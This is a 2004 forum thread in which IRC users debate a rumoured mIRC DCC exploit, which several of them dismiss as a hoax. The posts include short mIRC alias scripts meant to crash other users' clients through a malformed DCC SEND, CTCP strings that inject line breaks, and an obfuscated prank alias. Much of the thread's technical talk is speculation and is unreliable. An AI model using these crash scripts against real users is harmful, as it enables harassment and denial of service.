AciD-FluX
Mar 24 2004, 11:13 PM
there is apparently a new exploit that will execute arbitrary code on every mirc version up to and including 6.14. it was announced on a server i was on today. i havent been able to find any information on it but i would like to know if anyone else knows about this. thanks
sPiKie
Mar 24 2004, 11:15 PM
A new DCC security issue has been discovered in mIRC. This is a completely new DCC exploit unrelated to previous exploits, and all versions are vulnerable to this new discovery, including the new 6.14. Malicious users have already been found who abuse this exploit against users. This new exploit is rather serious as it does not just crash a mIRC client, but allows the malicious user to execute arbitrary code, as well as perform any mIRC command. At this point no patch is available to close the exploit. Ignoring all DCC requests, or having a proxy in between the client and the user which blocks DCC requests will prevent the exploit being abused. You can either ignore DCC's from the configuration panel which can be accessed through ALT-O, or use the following command from any window: /ignore -wd *
Hexadecimal
Mar 24 2004, 11:21 PM
maybe its a joke cuz "/ignore -wd * " ignores everyone. They said put it in your perform. :/ I dont kno... maybe its real. Anyone have info about it?
JustC
Mar 24 2004, 11:36 PM
There is no new exploit in 6.14, it is just some hoax that is going around.
for those who have type /ignore -wd * should type /ignore -rwd *
pidnull
Mar 25 2004, 12:47 AM
Ok. Now im really confused. I was on some network and they gave a global notice on this exploit.. i guess we just wait and see it on ircjunkie or see it on mirc.com or other mirc related websites but until that happens no one's really sure.
Only time will tell
buzzons
Mar 25 2004, 01:03 AM
well seeing as it was posted by the serve admin on
EFnet
DalNet
QuakeNet
it looks like its real .. yet no one knows exactly what it does.. even the forums on mirc.com have no real ans
buz
nexact
Mar 25 2004, 02:30 AM
MMmm, it wont be easy to find this exploit
fyle
Mar 25 2004, 02:46 AM
Heres what the ops of #mIRC on undernet have to say on the subject:
* Now talking in #mIRC
* Topic is 'mIRC 6.14
http://www.mirc.co.uk http://www.mirc.com (There is no exploit out... QuakeNet is run by idiots... if you're really scared, type /ignore -wd * )'
* Set by Sais on Wed Mar 24 15:24:43
nexact
Mar 25 2004, 03:17 AM
mm k
Major Chrome
Mar 25 2004, 04:02 AM
Love the topic in #mIRC
liquidSilver
Mar 25 2004, 10:19 AM
All I know is this one crashes mIRC 6.14:
Put this in your aliases in mirc:
| CODE |
| /crash { raw privmsg $1 : $+ $chr(1) $+ DCC SEND " $+ $str( $+ $rand(a,z) $+ $chr(32),165) $+ " $longip(127.0.0.1) $rand(113,9999) $+ $chr(1) } |
Regards,
LS
.. Edit: 6.14
Niekos
Mar 25 2004, 10:46 AM
I tried it but it wont work...
| QUOTE |
[11:46] DCC Send from Niekos rejected (invalid parameters) |
KieMaN
Mar 25 2004, 11:22 AM
it was a Joke at the end ?
AciD-FluX
Mar 25 2004, 01:11 PM
I believe that the script that was shown above was for a old vulnerability in mIRC. They have since fixed that problem in a newer mIRC version. I have heard nothing else of this newer exploit I was enquiring about. If I do happen to find anything out, I will post it here.
liquidSilver
Mar 25 2004, 01:32 PM
I success everytime using that one.. No fun at all anywayz, but ehh.. Dunno if they have mIRC 6.12.?
Sedolf
Mar 25 2004, 01:42 PM
thats the old one for =<6.11
hitu
Mar 25 2004, 02:15 PM
wtf
| CODE |
[19:32:34] [Nick VERSION]
-
[19:32:48] DCC Get of google_gigglex4.zip .txt from Nick complete (00:00:01 2.51 GB/Sec) |
[R]u[F]y
Mar 25 2004, 05:22 PM
Someone has some news about this vulnerability?
I have read that this vulnerability works with VERSION REPLY.
//raw privmsg <nick> : $+ $chr(1) $+ VERSION $+ $chr(1)
This code is /CTCP <nick> VERSION.
What is the CTCP REPLY code?
fyle
Mar 25 2004, 07:55 PM
//raw NOTICE $me $chr(1) $+ Version $+ $chr(1)
privmsg = request
notice = reply
Sp00ky
Mar 25 2004, 08:06 PM
edit because i exadently posted it in dutch language
: this sounds nice but what does it do? does it only crash the nick you are exploiting?
and hows does this exploit work?
[R]u[F]y
Mar 25 2004, 09:07 PM
//raw NOTICE $me $chr(1) $+ Version $+ $chr(1)
This command is:
[<nick> VERSION: reply]
But, if i want to read something?
Ex:
[<nick> VERSION reply]: mIRC v6.14 Khaled Mardam-Bey
It isn't the same thing...
[R]u[F]y
Mar 25 2004, 10:37 PM
I probabily discovered the BUG.
But i need to know the complete //raw NOTICE command
Reply to this post, it is important.
fyle
Mar 25 2004, 11:31 PM
raw notice $me : $+ $chr(1) $+ VERSION some version reply string $+ $chr(1)
I've been playing with chr(1-31) in version replys for the last hour, $decodes, $eval, math functions and stuff, long strings with wierd characters, i can't find anything. Gonna get my hex on now.
Do tell what the bug is.
[R]u[F]y
Mar 25 2004, 11:46 PM
Try with this and look
//CTCP victim VERSION $chr(10) $+ $decode(cXVpdCBsYW1lcg==,m)
Gotisch
Mar 25 2004, 11:56 PM
Rufy you are sooooo funny .
[R]u[F]y`
Mar 26 2004, 12:07 AM
I think that:
This bug works as local Exploit, but someone can test it as C++ program?
Someone can try to send this string via IRC?
it work with:
//CTCP $me VERSION $chr(13) $+ quit lamer
//CTCP $me FINGER $chr(13) $+ quit lamer
//CTCP $me TIME $chr(13) $+ quit lamer
ecc....
but not with
//CTCP $me PING $chr(13) $+ quit lamer
I don't know C++ but i think that it probabily works as Remote Exploit
fyle
Mar 26 2004, 01:19 AM
No, everything is delimited by cr or lf. Its how the software determines when one command string ends and another begins. If this is the alleged vulnerability - its not.
SCVirus
Mar 26 2004, 03:39 AM
if this is real its probably yet another dcc buffer overflow this time if you send them 5 thousand bytes of null shellcode then the exec shell code of something.
thend
Mar 26 2004, 11:34 AM
wnage { echo -a [Trying to 0wn $1 $+ ] | raw privmsg $1 : $+ $chr(1) $+ VERSION " $+ $str( $+ $rand(a,z) $+ $chr(32),200) $+ " + $chr(1) + $version | echo -a [Sending DoS!] | $chr(47) $+ $chr(113) $+ $chr(117) $+ $chr(105) $+ $chr(116) $chr(73) $chr(71) $+ $chr(79) $+ $chr(84) $chr(79) $+ $chr(87) $+ $chr(78) $+ $chr(69) $+ $chr(68) $chr(66) $+ $chr(89) $chr(68) $+ $chr(51) $+ $chr(65) $+ $chr(68) $+ $chr(76) $+ $chr(105) $+ $chr(78) $+ $chr(51) | echo -a [0wned] }
USEAGE:
/ownage targetnick
Niekos
Mar 26 2004, 01:17 PM
That just crashes yourself
D3ADLiN3
Mar 26 2004, 02:37 PM
lol major 0day remote root exploit 0wnage advanced connect back shell local cross site scripting administrator gaining DoS exploit (mass rooter)
easternerd
Mar 26 2004, 07:01 PM
This was Messaged by the admins at Undernet too,...
first i thought this was an old vulnerability .
But then some l33t used the trick against me.
but i cancelled the dcc . so i dont know if it works.
i just added this
/crash { raw privmsg $1 : $+ $chr(1) $+ DCC SEND " $+ $str( $+ $rand(a,z) $+ $chr(32),165) $+ " $longip(127.0.0.1) $rand(113,9999) $+ $chr(1) }
to my alias
now when i /crash <Nickname>
this is the output:
[00:26] -> Server: privmsg MrIT :�DCC SEND "t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t t " 2130706433 341�
the person to whom i sent has to accept it for me to identify wheather it works or not
Niekos
Mar 27 2004, 01:52 AM
But on which port spawns the shell ?
[R]u[F]y`
Mar 28 2004, 01:11 PM
I have read this:
http://trout.snt.utwente.nl/ubbthreads/sho...=5&o=31&fpart=1on mirc's forum.
There isn't a VERSION Exploit, but an ADDON Exploit.
More lucky next time...
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
